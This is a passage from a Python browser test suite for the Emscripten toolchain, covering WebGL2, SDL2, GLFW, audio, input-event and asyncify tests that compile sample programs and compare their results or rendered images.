self.btest_exit(test_file('webgl2.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'] + opts) # Tests the WebGL 2 glGetBufferSubData() functionality. 
  @requires_graphics_hardware
  def test_webgl2_get_buffer_sub_data(self):
    self.btest_exit(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])

  @requires_graphics_hardware
  @requires_threads
  def test_webgl2_pthreads(self):
    # test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
    # (the testcase doesn't even use threads, but is compiled with thread support).
    self.btest_exit(test_file('webgl2.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL', '-sUSE_PTHREADS'])

  @requires_graphics_hardware
  def test_webgl2_objects(self):
    self.btest_exit(test_file('webgl2_objects.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])

  @requires_graphics_hardware
  def test_html5_webgl_api(self):
    # Run the HTML5 WebGL API test with offscreen canvas, offscreen
    # framebuffer, and plain configurations.
    for mode in [['-sOFFSCREENCANVAS_SUPPORT', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],
                 ['-sOFFSCREEN_FRAMEBUFFER', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],
                 []]:
      # NOTE(review): `mode` is a list whose element is '-sOFFSCREENCANVAS_SUPPORT';
      # `'OFFSCREENCANVAS_SUPPORT' in mode` is an exact-match list membership test,
      # so this skip condition may never trigger — verify whether `in str(mode)`
      # was intended.
      if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
        continue
      self.btest_exit(test_file('html5_webgl.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'] + mode)

  @requires_graphics_hardware
  def test_webgl2_ubos(self):
    self.btest_exit(test_file('webgl2_ubos.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])

  @requires_graphics_hardware
  def test_webgl2_garbage_free_entrypoints(self):
    # Build both with and without WebGL2 enabled.
    self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'])
    self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'))

  @requires_graphics_hardware
  def test_webgl2_backwards_compatibility_emulation(self):
    self.btest_exit(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-sWEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'])

  @requires_graphics_hardware
  def test_webgl2_runtime_no_context(self):
    # tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
    # but context creation fails, that we can then manually try to create a
    # WebGL1 context and succeed.
    self.btest_exit(test_file('test_webgl2_runtime_no_context.cpp'), args=['-sMAX_WEBGL_VERSION=2'])

  @requires_graphics_hardware
  def test_webgl2_invalid_teximage2d_type(self):
    self.btest_exit(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-sMAX_WEBGL_VERSION=2'])

  @requires_graphics_hardware
  def test_webgl_with_closure(self):
    self.btest_exit(test_file('webgl_with_closure.cpp'), args=['-O2', '-sMAX_WEBGL_VERSION=2', '--closure=1', '-lGL'])

  # Tests that -sGL_ASSERTIONS and glVertexAttribPointer with packed types works
  @requires_graphics_hardware
  def test_webgl2_packed_types(self):
    self.btest_exit(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-sMAX_WEBGL_VERSION=2', '-sGL_ASSERTIONS'])

  @requires_graphics_hardware
  def test_webgl2_pbo(self):
    self.btest_exit(test_file('webgl2_pbo.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])

  @no_firefox('fails on CI likely due to GPU drivers there')
  @requires_graphics_hardware
  def test_webgl2_sokol_mipmap(self):
    # Reference-image test; slack of 2 tolerates minor per-driver differences.
    self.btest(test_file('third_party/sokol/mipmap-emsc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL', '-O1'],
               reference=Path('third_party/sokol', 'mipmap-emsc.png'), reference_slack=2)

  @no_firefox('fails on CI likely due to GPU drivers there')
  @requires_graphics_hardware
  def test_webgl2_sokol_mrt(self):
    self.btest(test_file('third_party/sokol/mrt-emcc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'],
               reference=Path('third_party/sokol', 'mrt-emcc.png'))

  @requires_graphics_hardware
  def test_webgl2_sokol_arraytex(self):
    self.btest(test_file('third_party/sokol/arraytex-emsc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'],
               reference=Path('third_party/sokol', 'arraytex-emsc.png'))

  def test_sdl_touch(self):
    for opts in [[], ['-O2', '-g1', '--closure=1']]:
      print(opts)
      self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')

  def test_html5_mouse(self):
    for opts in [[], ['-O2', '-g1', '--closure=1']]:
      print(opts)
      self.btest(test_file('test_html5_mouse.c'), args=opts +
['-DAUTOMATE_SUCCESS=1'], expected='0')

  def test_sdl2_mousewheel(self):
    for opts in [[], ['-O2', '-g1', '--closure=1']]:
      print(opts)
      self.btest_exit(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'])

  def test_wget(self):
    create_file('test.txt', 'emscripten')
    self.btest_exit(test_file('test_wget.c'), args=['-sASYNCIFY'])

  def test_wget_data(self):
    create_file('test.txt', 'emscripten')
    self.btest_exit(test_file('test_wget_data.c'), args=['-O2', '-g2', '-sASYNCIFY'])

  @parameterized({
    '': ([],),
    'es6': (['-sEXPORT_ES6=1'],),
  })
  def test_locate_file(self, args):
    # Verify Module.locateFile redirects loading of secondary outputs
    # (.wasm / .mem / .data) to another directory, both via --pre-js and via
    # the shell HTML.
    self.set_setting('EXIT_RUNTIME')
    for wasm in [0, 1]:
      self.clear()
      create_file('src.cpp', r'''
        #include <stdio.h>
        #include <string.h>
        #include <assert.h>
        int main() {
          FILE *f = fopen("data.txt", "r");
          assert(f && "could not open file");
          char buf[100];
          int num = fread(buf, 1, 20, f);
          assert(num == 20 && "could not read 20 bytes");
          buf[20] = 0;
          fclose(f);
          printf("|%s|\n", buf);
          assert(strcmp("load me right before", buf) == 0);
          return 0;
        }
      ''')
      create_file('data.txt', 'load me right before...')
      create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
      # NOTE(review): the open('data.js', 'w') handle is never explicitly
      # closed; consider a `with` block (relies on CPython refcounting here).
      self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
      # put pre.js first, then the file packager data, so locateFile is there for the file loading code
      self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-sFORCE_FILESYSTEM', '-sWASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
      ensure_dir('sub')
      if wasm:
        shutil.move('page.wasm', Path('sub/page.wasm'))
      else:
        shutil.move('page.html.mem', Path('sub/page.html.mem'))
      shutil.move('test.data', Path('sub/test.data'))
      self.run_browser('page.html', None, '/report_result?exit:0')

    # alternatively, put locateFile in the HTML
    print('in html')

    create_file('shell.html', '''
      <body>
        <script>
          var Module = {
            locateFile: function(x) { return "sub/" + x }
          };
        </script>
        {{{ SCRIPT }}}
      </body>
    ''')

    def in_html(expected):
      # Build against the custom shell and expect the given exit report.
      self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-sSAFE_HEAP', '-sASSERTIONS', '-sFORCE_FILESYSTEM', '-sWASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
      if wasm:
        shutil.move('page.wasm', Path('sub/page.wasm'))
      else:
        shutil.move('page.html.mem', Path('sub/page.html.mem'))
      self.run_browser('page.html', None, '/report_result?exit:' + expected)

    in_html('0')

    # verify that the mem init request succeeded in the latter case
    if not wasm:
      create_file('src.cpp', r'''
        #include <stdio.h>
        #include <emscripten.h>

        int main() {
          int result = EM_ASM_INT({
            return Module['memoryInitializerRequest'].status;
          });
          printf("memory init request: %d\n", result);
          return result;
        }
      ''')

      in_html('200')

  @requires_graphics_hardware
  @parameterized({
    'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
    'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
  })
  def test_glfw3(self, args):
    for opts in [[], ['-sLEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
      print(opts)
      self.btest(test_file('glfw3.c'), args=['-sUSE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')

  @requires_graphics_hardware
  def test_glfw_events(self):
    # Same test under both the GLFW 2 and GLFW 3 emulation layers.
    self.btest(test_file('glfw_events.c'), args=['-sUSE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
    self.btest(test_file('glfw_events.c'), args=['-sUSE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')

  @requires_graphics_hardware
  def test_sdl2_image(self):
    # load an image file, get pixel data.
    # Also O2 coverage for --preload-file, and memory-init
    shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')

    # Exercise both memory-init modes and both plain / mapped (@) preload paths.
    for mem in [0, 1]:
      for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
                                      ('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
        self.compile_btest([
          test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
          '--preload-file', dest,
          '-DSCREENSHOT_DIRNAME="' + dirname + '"',
          '-DSCREENSHOT_BASENAME="' + basename + '"',
          '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--use-preload-plugins'
        ])
        self.run_browser('page.html', '', '/report_result?600')

  @requires_graphics_hardware
  def test_sdl2_image_jpeg(self):
    # Same as above but with a .jpeg extension to check extension handling.
    shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
    self.compile_btest([
      test_file('sdl2_image.c'), '-o', 'page.html',
      '--preload-file', 'screenshot.jpeg',
      '-DSCREENSHOT_DIRNAME="/"',
      '-DSCREENSHOT_BASENAME="screenshot.jpeg"',
      '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--use-preload-plugins'
    ])
    self.run_browser('page.html', '', '/report_result?600')

  @requires_graphics_hardware
  def test_sdl2_image_formats(self):
    # Restrict SDL2_image to a single codec at a time via SDL2_IMAGE_FORMATS.
    shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
    shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
    self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"', '-DNO_PRELOADED',
                                                     '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-sSDL2_IMAGE_FORMATS=["png"]'])
    self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"', '-DBITSPERPIXEL=24', '-DNO_PRELOADED',
                                                     '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-sSDL2_IMAGE_FORMATS=["jpg"]'])

  def test_sdl2_key(self):
    # Drive the compiled app via synthetic keydown/keypress/keyup events.
    create_file('pre.js', '''
      Module.postRun = function() {
        function doOne() {
          Module._one();
          setTimeout(doOne, 1000/60);
        }
        setTimeout(doOne, 1000/60);
      }

      function keydown(c) {
        var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
        var prevented = !document.dispatchEvent(event);

        //send keypress if not prevented
        if (!prevented) {
          var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
          document.dispatchEvent(event);
        }
      }

      function keyup(c) {
        var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
        document.dispatchEvent(event);
      }
    ''')
    self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-sUSE_SDL=2', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one'])
    self.run_browser('page.html', '', '/report_result?37182145')

  def test_sdl2_text(self):
    # Text input via synthetic keypress events dispatched on document.body.
    create_file('pre.js', '''
      Module.postRun = function() {
        function doOne() {
          Module._one();
          setTimeout(doOne, 1000/60);
        }
        setTimeout(doOne, 1000/60);
      }

      function simulateKeyEvent(c) {
        var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
        document.body.dispatchEvent(event);
      }
    ''')
    self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-sUSE_SDL=2'])
    self.run_browser('page.html', '', '/report_result?1')

  @requires_graphics_hardware
  def test_sdl2_mouse(self):
    # Mouse events positioned relative to the canvas offset.
    create_file('pre.js', '''
      function simulateMouseEvent(x, y, button) {
        var event = document.createEvent("MouseEvents");
        if (button >= 0) {
          var event1 = document.createEvent("MouseEvents");
          event1.initMouseEvent('mousedown', true, true, window,
                     1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
                     0, 0, 0, 0,
                     button, null);
          Module['canvas'].dispatchEvent(event1);
          var event2 = document.createEvent("MouseEvents");
          event2.initMouseEvent('mouseup', true, true, window,
                     1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
                     0, 0, 0, 0,
                     button, null);
          Module['canvas'].dispatchEvent(event2);
        } else {
          var event1 = document.createEvent("MouseEvents");
          event1.initMouseEvent('mousemove', true, true, window,
                     0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
                     0, 0, 0, 0,
                     0, null);
          Module['canvas'].dispatchEvent(event1);
        }
      }
      window['simulateMouseEvent'] = simulateMouseEvent;
    ''')
    self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-sUSE_SDL=2'])
    self.run_browser('page.html', '', '/report_result?1')

  @requires_graphics_hardware
  def test_sdl2_mouse_offsets(self):
    # Like test_sdl2_mouse but the canvas sits at a non-zero page offset; events
    # use absolute page coordinates so SDL must subtract the canvas offset.
    create_file('pre.js', '''
      function simulateMouseEvent(x, y, button) {
        var event = document.createEvent("MouseEvents");
        if (button >= 0) {
          var event1 = document.createEvent("MouseEvents");
          event1.initMouseEvent('mousedown', true, true, window,
                     1, x, y, x, y,
                     0, 0, 0, 0,
                     button, null);
          Module['canvas'].dispatchEvent(event1);
          var event2 = document.createEvent("MouseEvents");
          event2.initMouseEvent('mouseup', true, true, window,
                     1, x, y, x, y,
                     0, 0, 0, 0,
                     button, null);
          Module['canvas'].dispatchEvent(event2);
        } else {
          var event1 = document.createEvent("MouseEvents");
          event1.initMouseEvent('mousemove', true, true, window,
                     0, x, y, x, y,
                     0, 0, 0, 0,
                     0, null);
          Module['canvas'].dispatchEvent(event1);
        }
      }
      window['simulateMouseEvent'] = simulateMouseEvent;
    ''')
    create_file('page.html', '''
      <html>
        <head>
          <style type="text/css">
            html, body { margin: 0; padding: 0; }
            #container {
              position: absolute;
              left: 5px; right: 0;
              top: 5px; bottom: 0;
            }
            #canvas {
              position: absolute;
              left: 0; width: 600px;
              top: 0; height: 450px;
            }
            textarea {
              margin-top: 500px;
              margin-left: 5px;
              width: 600px;
            }
          </style>
        </head>
        <body>
          <div id="container">
            <canvas id="canvas"></canvas>
          </div>
          <textarea id="output" rows="8"></textarea>
          <script type="text/javascript">
            var Module = {
              canvas: document.getElementById('canvas'),
              print: (function() {
                var element = document.getElementById('output');
                element.value = ''; // clear browser cache
                return function(text) {
                  if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
                  element.value += text + "\\n";
                  element.scrollTop = element.scrollHeight; // focus on bottom
                };
              })()
            };
          </script>
          <script type="text/javascript" src="sdl2_mouse.js"></script>
        </body>
      </html>
    ''')
    self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-sUSE_SDL=2'])
    self.run_browser('page.html', '', '/report_result?1')

  @requires_threads
  def test_sdl2_threads(self):
    self.btest('sdl2_threads.c', expected='4', args=['-sUSE_PTHREADS', '-sUSE_SDL=2', '-sPROXY_TO_PTHREAD'])

  @requires_graphics_hardware
  def test_sdl2glshader(self):
    self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-sUSE_SDL=2', '-O2', '--closure=1', '-g1', '-sLEGACY_GL_EMULATION'])
    self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-sUSE_SDL=2', '-O2', '-sLEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy

  @requires_graphics_hardware
  def test_sdl2_canvas_blank(self):
    self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-sUSE_SDL=2'])

  @requires_graphics_hardware
  def test_sdl2_canvas_palette(self):
    self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-sUSE_SDL=2'])

  @requires_graphics_hardware
  def test_sdl2_canvas_twice(self):
    self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-sUSE_SDL=2'])

  @requires_graphics_hardware
  def test_sdl2_gfx(self):
    self.btest('sdl2_gfx.cpp', args=['-sUSE_SDL=2', '-sUSE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)

  @requires_graphics_hardware
  def test_sdl2_canvas_palette_2(self):
    # Pass a different command-line argument (-r/-g/-b) via a pre-js per run.
    create_file('args-r.js', '''
      Module['arguments'] = ['-r'];
    ''')

    create_file('args-g.js', '''
      Module['arguments'] = ['-g'];
    ''')
    create_file('args-b.js', '''
      Module['arguments'] = ['-b'];
    ''')

    self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-sUSE_SDL=2', '--pre-js', 'args-r.js'])
    self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-sUSE_SDL=2', '--pre-js', 'args-g.js'])
    self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-sUSE_SDL=2', '--pre-js', 'args-b.js'])

  def test_sdl2_swsurface(self):
    self.btest('sdl2_swsurface.c', expected='1', args=['-sUSE_SDL=2', '-sINITIAL_MEMORY=64MB'])

  @requires_graphics_hardware
  def test_sdl2_image_prepare(self):
    # load an image file, get pixel data.
    # The .not extension forces the preload plugin path rather than MIME sniffing.
    shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
    self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2'], manually_trigger_reftest=True)

  @requires_graphics_hardware
  def test_sdl2_image_prepare_data(self):
    # load an image file, get pixel data.
    shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
    self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2'], manually_trigger_reftest=True)

  @requires_graphics_hardware
  def test_sdl2_canvas_proxy(self):
    # Inject a reftest trigger into the generated HTML after build, since the
    # canvas renders in a worker (--proxy-to-worker).
    def post():
      html = read_file('test.html')
      html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }

%s

var windowClose = window.close;
window.close = function() {
  // wait for rafs to arrive and the screen to update before reftesting
  setTimeout(function() {
    doReftest();
    setTimeout(windowClose, 5000);
  }, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
      create_file('test.html', html)

    create_file('data.txt', 'datum')

    self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-sUSE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-sGL_TESTING'], manual_reference=True, post_build=post)

  def test_sdl2_pumpevents(self):
    # key events should be detected using SDL_PumpEvents
    create_file('pre.js', '''
      function keydown(c) {
        var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
        document.dispatchEvent(event);
      }
    ''')
    self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-sUSE_SDL=2'])

  def test_sdl2_timer(self):
    self.btest('sdl2_timer.c', expected='5', args=['-sUSE_SDL=2'])

  def test_sdl2_canvas_size(self):
    self.btest('sdl2_canvas_size.c', expected='1', args=['-sUSE_SDL=2'])

  @requires_graphics_hardware
  def test_sdl2_gl_read(self):
    # SDL, OpenGL, readPixels
    self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-sUSE_SDL=2'])
    self.run_browser('something.html', '.', '/report_result?1')

  @requires_graphics_hardware
  def test_sdl2_glmatrixmode_texture(self):
    self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
               args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
               message='You should see a (top) red-white and (bottom) white-red image.')

  @requires_graphics_hardware
  def test_sdl2_gldrawelements(self):
    self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
               args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
               message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')

  @requires_graphics_hardware
  def test_sdl2_glclipplane_gllighting(self):
    self.btest('sdl2_glclipplane_gllighting.c', reference='sdl2_glclipplane_gllighting.png',
               args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
               message='glClipPlane and GL_LIGHTING emulation. You should see a torus cut open on one side with lighting from one lightsource applied.')

  @requires_graphics_hardware
  def test_sdl2_glalphatest(self):
    self.btest('sdl2_glalphatest.c', reference='sdl2_glalphatest.png',
               args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
               message='GL_ALPHA_TEST emulation. You should see gradients with different alpha testing modes and reference values.')

  @requires_graphics_hardware
  def test_sdl2_fog_simple(self):
    shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
    self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
               args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
               message='You should see an image with fog.')

  @requires_graphics_hardware
  def test_sdl2_fog_negative(self):
    shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
    self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
               args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
               message='You should see an image with fog.')

  @requires_graphics_hardware
  def test_sdl2_fog_density(self):
    shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
    self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
               args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
               message='You should see an image with fog.')

  @requires_graphics_hardware
  def test_sdl2_fog_exp2(self):
    shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
    self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
               args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
               message='You should see an image with fog.')

  @requires_graphics_hardware
  def test_sdl2_fog_linear(self):
    shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
    self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
               args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
               message='You should see an image with fog.')

  def test_sdl2_unwasteful(self):
    self.btest('sdl2_unwasteful.cpp', expected='1', args=['-sUSE_SDL=2', '-O1'])

  def test_sdl2_canvas_write(self):
    self.btest('sdl2_canvas_write.cpp', expected='0', args=['-sUSE_SDL=2'])

  @requires_graphics_hardware
  def test_sdl2_gl_frames_swap(self):
    # Strip the postRun reftest hook so the comparison happens on a later
    # frame, not the very first one.
    def post_build(*args):
      self.post_manual_reftest(*args)
      html = read_file('test.html')
      html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
      assert html != html2
      create_file('test.html', html2)
    self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-sGL_TESTING', '-sUSE_SDL=2'], manual_reference=True, post_build=post_build)

  @requires_graphics_hardware
  def test_sdl2_ttf(self):
    shutil.copy2(test_file('freetype/LiberationSansBold.ttf'), self.get_dir())
    self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
               args=['-O2', '-sUSE_SDL=2', '-sUSE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
               message='You should see colorful "hello" and "world" in the window')

  @requires_graphics_hardware
  def test_sdl2_ttf_rtl(self):
    # Right-to-left (Arabic) text shaping through SDL2_ttf.
    shutil.copy2(test_file('third_party/notofont/NotoNaskhArabic-Regular.ttf'), self.get_dir())
    self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
               args=['-O2', '-sUSE_SDL=2', '-sUSE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
               message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')

  def test_sdl2_custom_cursor(self):
    shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
    self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-sUSE_SDL=2'])

  def test_sdl2_misc(self):
    self.btest_exit('sdl2_misc.c', args=['-sUSE_SDL=2'])

  def test_sdl2_misc_main_module(self):
    self.btest_exit('sdl2_misc.c', args=['-sUSE_SDL=2', '-sMAIN_MODULE'])

  def test_sdl2_misc_via_object(self):
    # Compile to an object file first, then link — checks the SDL2 port works
    # across a separate compile/link step.
    self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-sUSE_SDL=2', '-o', 'test.o'])
    self.compile_btest(['test.o', '-sEXIT_RUNTIME', '-sUSE_SDL=2', '-o', 'test.html'])
    self.run_browser('test.html', '...', '/report_result?exit:0')

  @parameterized({
    'dash_s': (['-sUSE_SDL=2', '-sUSE_SDL_MIXER=2'],),
    'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
  })
  @requires_sound_hardware
  def test_sdl2_mixer_wav(self, flags):
    shutil.copyfile(test_file('sounds/the_entertainer.wav'), 'sound.wav')
    self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-sINITIAL_MEMORY=33554432'] + flags)

  @parameterized({
    'wav': ([], '0', 'the_entertainer.wav'),
    'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
    'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
    'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
    # TODO: need to source freepats.cfg and a midi file
    # 'mod': (['mid'], 'MIX_INIT_MID', 'midi.mid'),
  })
  @requires_sound_hardware
  def test_sdl2_mixer_music(self, formats, flags, music_name):
    # One parameterization per audio codec supported by SDL2_mixer.
    shutil.copyfile(test_file('sounds', music_name), music_name)
    self.btest('sdl2_mixer_music.c', expected='1', args=[
      '--preload-file', music_name,
      '-DSOUND_PATH=' + json.dumps(music_name),
      '-DFLAGS=' + flags,
      '-sUSE_SDL=2',
      '-sUSE_SDL_MIXER=2',
      '-sSDL2_MIXER_FORMATS=' + json.dumps(formats),
      '-sINITIAL_MEMORY=33554432'
    ])

  @requires_graphics_hardware
  def test_cocos2d_hello(self):
    cocos2d_root = os.path.join(ports.Ports.get_build_dir(), 'cocos2d')
    preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
    self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
               args=['-sUSE_COCOS2D=3', '-sERROR_ON_UNDEFINED_SYMBOLS=0',
                     '--preload-file', preload_file, '--use-preload-plugins',
                     '-Wno-inconsistent-missing-override'],
               message='You should see Cocos2d logo')

  def test_async(self):
    # Asyncify coverage at each optimization level.
    for opts in [0, 1, 2, 3]:
      print(opts)
      self.btest_exit('browser/async.cpp', args=['-O' + str(opts), '-g2', '-sASYNCIFY'])

  def test_asyncify_tricky_function_sig(self):
    self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-sASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-sASYNCIFY=1'])

  @requires_threads
  def test_async_in_pthread(self):
    self.btest_exit('browser/async.cpp', args=['-sASYNCIFY', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-g'])

  def test_async_2(self):
    # Error.stackTraceLimit default to 10 in chrome but this test relies on more
    # than 40 stack frames being reported.
    create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
